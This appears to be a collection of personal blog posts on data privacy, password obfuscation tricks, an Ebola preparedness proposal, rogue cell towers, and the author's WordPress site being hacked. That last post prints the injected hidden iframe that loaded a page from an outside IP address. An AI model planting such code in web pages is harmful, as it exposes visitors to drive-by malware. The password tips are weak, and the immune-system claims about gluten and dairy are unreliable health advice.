I think the real bottom line is… how do companies and individuals protect themselves and still thrive under the very real reality that global tensions influence the security of data online.
The iPhone 6 Plus may be bending in people’s pockets and under the pressure of tough hands, but it’s not bending to the will of the US National Security Agency NSA any longer.” – inverse.com
Very nice to hear the iPhone 6 can defeat the NSA; I just don’t think I believe it. It’s also a little bit funny that Apple would leverage this slippery topic (NSA domestic spying) to market their phones – but maybe it will help this very real issue be taken more seriously by the main stream.
Why am I skeptical about their data encryption claims? I’m not sure anyone really knows what a hacker can hack unless that hacker makes it known to you. For all I know the CIA & NSA can decrypt MD5 and other hashes. If they choose to watch and leave no trace of their visit – how would I know they were here. Oh sure I could analyze logs and hope intruder detection software works – but a clever hacker may be able to access any connected system.
Hidden Bunkers are Better than Castles – I think of encryption like a fortress. Any fortress can be taken, any defense defeated, it’s a historical fact. So a slightly better strategy may be camouflage. Instead of putting your data in an encrypted vault that has a big sign on it saying ‘SAFE’, put it in a hidden safe – or don’t put it online at all. In other words think hidden bunker versus castle because if they don’t even know you’re there, they can get you. (Good strategy for the Zombie Apocalypse too!)
Camouflaged Bunkers with Secret Doors are Better than Bunkers – If you can’t hide the fact that you exist, consider a camouflage deception. For example, if you keep passwords on your computer put some fake passwords and accounts in a fake file named ‘My Passwords’. Then somewhere else, under an inconspicuous filename, put the real passwords file and create a simple, easy to remember ‘decryption code’ that you keep in your head and can use on-the-fly.
In other words use a self-invented Pig Latin decryption key. Don’t use Pig Latin itself – too easy to decrypt, but invent something as easy to remember. Here’s a Pig Latin refresher:
- pig => igpay,
- banana => ananabay
- trash => ashtray
Like I said, while this particular method would be easy to guess, it illustrates the idea. To take it the next level you might consider some of the following ideas:
- Add two random characters to the front or back of your recorded passwords. You simply remember to ignore the first or last characters. This would be very easy to remember but easier to crack too.
- In the real passwords use certain numbers for letters that resemble them like 8 for B or 7 for L. Then when using the password you just remember Bs are actually 8s.
- Record correctly spelled words in passwords (which is a terrible thing to do for real passwords) then remember your preferred misspelling of that word in the true password. For example, 1Password! might really be 1Pazzwerd!
- Flip two word passwords around. For example, record a password like, 1badpassword! but really use password!1bad.
- If you flip things around in any way, like letters or words, be sure they look more correct in their encrypted form. This way the obvious decryption is not easy to spot. For example, if the encrypted password is: 1RedBird! the true password could be: Bird!1Red. The capital letter in the middle of the string shows you where to flip it and RedBird actually makes sense so it just looks like a bad but real password. You could step it up and always replace certain letters with numbers like: 8ird!1R3d (capital B is 8 -and- e is 3).
So why go through this? Hackers hack, and if they can get into a big corporations like Target & Home Depot they can hack your computer. Most of the time professional hackers are going to focus on the castles because the loot is more plentiful, but home networks are easy prey.
Many times home networks are insecure and have wide open holes via printers and other networked devices. So the information on our computers is vulnerable, especially if we leave our computers on all the time without firewalls enabled. With automated tools hackers can scan the Internet in their sleep looking for vulnerable systems, so even though your system may not look like a gold mine, the bots may still visit and test your security.
These little Pig Latin Encryption tricks may seem extreme, but they could be your last line of defense if someone were to hack your machine. The hacker would think they have your password list, but in truth they would have to spend real time (as opposed to automated bot time) to noodle-through your password encryption – assuming they thought you had implemented one. It’s more likely that they would just give up and move on.
You can do the same thing with credit card numbers, drivers license numbers, social security numbers, and so on – assuming you already keep a list of those things on your computer.
But the true last line is to simply keep these things written in a little book in your pocket. But if you do that, definitely use a Pig Latin Decryption system since that little black book may someday go missing too, and that would suck.
I always try post solutions for the problems I callout in my posts. It just seems to be the right thing to do… if you don’t think something is being done right, suggest another way to go. These ideas often get buried in my posts. This is a repost of an idea I posted in response to what I’d characterize as Obama’s mishandling of the Ebola problem. You can see the original post here. Here’s the idea:
…This is an opportunity to kick-off a health-centric civil defense program, which might even help promote and support Obamacare indirectly.
The primary core message for jump-starting this program would be confronting Ebola head-on with an overwhelming force. It’s not an over-reaction to fear but a calculated asymmetrical assault on the disease that confronts every possible avenue this enemy could take. It’s not a war on Ebola, which would be too cliche, but an strategically overwhelming response that closes all gaps for this disease to spread.
Such a bold move could also earn President Obama serious kudos. Instead of attempting to downplay the risk, which the public sees as weakness and avoidance, he could use the appointment of Ron Klain as the catalyst for this shift in approach.
Immediate actions for a health-centric civil defense program could be:
- Encourage people to build-up their immune systems. Make it widely known that eating less gluten, dairy, fast food, manufactured food, etc, weakened the immune system and increases an individuals chance of beating any bug. Strengthened immune systems start with a healthy gut. When your gut is clogged with cheese, gluten, and empty calories they become a breeding ground for bad gut flora, and your health deteriorates.
- Develop and distribute a Home Ebola Early Detection Kit along with the necessary personal protective (PPE) gear and information to help people isolate households where Ebola is discovered. This should be as easy to use as a home pregnancy kit and come in easy safe disposal packaging.
- Encourage people to wear PPE gear as soon as they feel sick or travel in public – even if Ebola has not reached their area. Gloves and an N95 mask, plus good safe handling measures (avoid touching face, or unnecessarily touching surfaces) can give someone an edge over any contagious disease including the flu.
- Be ready to distribute supplies and care information to households where Ebola emerges. This will help folks voluntarily shelter in place for long time periods. At some point hospitals may not have space or adequate numbers of healthcare workers to handle a growing number of Ebola patients. If this happens we will need a back-up plan ready to roll. The most obvious next step would be to empower people to shelter in place and care for themselves.
- Provide people with assurances that they will not loose their jobs or income if their household needs to be quarantined. I realize this could get very expensive financially, but giving people the security to isolate themselves should help eliminate the pressure to leave their quarantine.
- Build a robust plan to keep public utilities operational like the power grid, water system, teach pickup, and sewer. Work immediately to decentralize the power grid to eliminate key points of failure and improve the overall robustness of the grid.
- Immediately ramp-up the manufacture of PAPR (Powered Air Purifying Respirator) forced air breathing units and other necessary PPE gear. While the current message from the WHO and CDC says that Ebola is not airborne, others suggest that it can be under certain situations. So as an informed precaution give healthcare workers and emergency responders the best PPE possible. This will also help keep people on the job longer.
- Until the danger has passed, improve control at the borders. Require waiting periods of up to several days to monitor for signs of infection. Use disaster relief housing units at the borders as temporary housing.
Consider making this kind of civil defense program international since the problem can travel everywhere. Then, like the powers-that-be are already suggesting, ramp up the international response in Africa. Heading off the disease at its source should be the top priority.
So just to recap… where I disagree with the White House is in the domestic approach, not the efforts in Africa.
What to Do?
I’m skeptical that our government is capable of implementing anything like this, or inclined to do so, we should consider these kinds of measures for ourselves. This you can do right now are:
- Learn how to improve your own immune system and make those changes now.
- Acquire basic PPE gear now (N95 masks, gloves, etc), and learn how to use it in an emergency.
- Be ready to shelter in place for an extended time.
- Reduce your exposure to all pathogens by limiting travel and unnecessary activities outside the home.
- Prepare back-up plans for electricity, water, and sewer.
An Ebola epidemic in America is on the table. We must not give into fear and respond stupidly, but we should not cling to the idea that everything is under control until the American people themselves feel empowered to defend themselves against this enemy.
So-called rogue cell phone towers, the type that can intercept your mobile calls and data, are cropping up all over the United States, including here in Chicago, according to a company that specializes in developing highly secure mobile phones…
ESD America’s cellphones protect users data, phone calls and text. The phone looks like a typical Android phone, but the inside includes encryption algorithms developed by a German company, GSMK, that protects the phone from intercepts.” – CBS Chicago
Hackers & thieves are clever buggers. Amazing the lengths they will go to turn a buck. Seems like the best hedge right now is to watch your bill and store no secure data on your phone, like credit cards, social security number, drivers license number, and passwords.
It seems to be a normal practice for network device manufacturers (like HP and IOmega) to leave the password protection wide open on all sorts of network devices like printers, scanners, security camera systems, network storage devices, and so on.
I suspect this is done to make the devices easier to install and use, increasing their user friendly feel while lowering the cost to support. Sadly the side effect is that hackers can easily connect to these devices and access your saved data. So while your computer may be secure with a password, your network devices may be wide open to hacking.
To protect yourself dive back into the manuals for your home network devices and learn how to activate the security functionality. Be sure to pick a difficult password to break that contains numbers, special characters, and most importantly words not found in any dictionary.
This morning at about 8AM my fellow tiny house blogger, Kent Griswold, let me know that this site was creating a security alert in Safari. The alert said that my site contained Malware. Immediately I started digging and within 20 minutes had figured it out. I’m not sure how it was done but a little tiny bit of code was stuck into one of my posts. Here is the code. Don’t worry it’s disabled but I would not recommend visiting that website.
<!– Web Stats –> <iframe src=http://188.8.131.52/stats.php?id=2 width=1 height=1 frameborder=0></iframe> <!– End Web Stats –>
It was only partly visible in html view, the iframe wouldn’t render so it looked virtually invisible. I changed my password, locked down my comments, and tightened up security. I suspect there may be a security hole in the current version of WordPress, but who knows it could have been some plug-in I was testing too.
I’m going to spend a little time later tonight changing passwords on all my blogs and doing what I can to protect myself. If you run blogs I suggest you try doing some searches for Malware too.
Lucky for me they picked my least busy blog, this one, my personal blog. It would seriously suck if my top blogs popped up warning screens like this one to all my visitors. Fricken hacker bastages!